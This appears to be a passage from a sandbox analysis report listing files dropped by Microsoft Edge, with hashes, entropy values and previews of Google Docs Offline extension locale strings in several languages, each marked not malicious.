                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                  Malicious:false
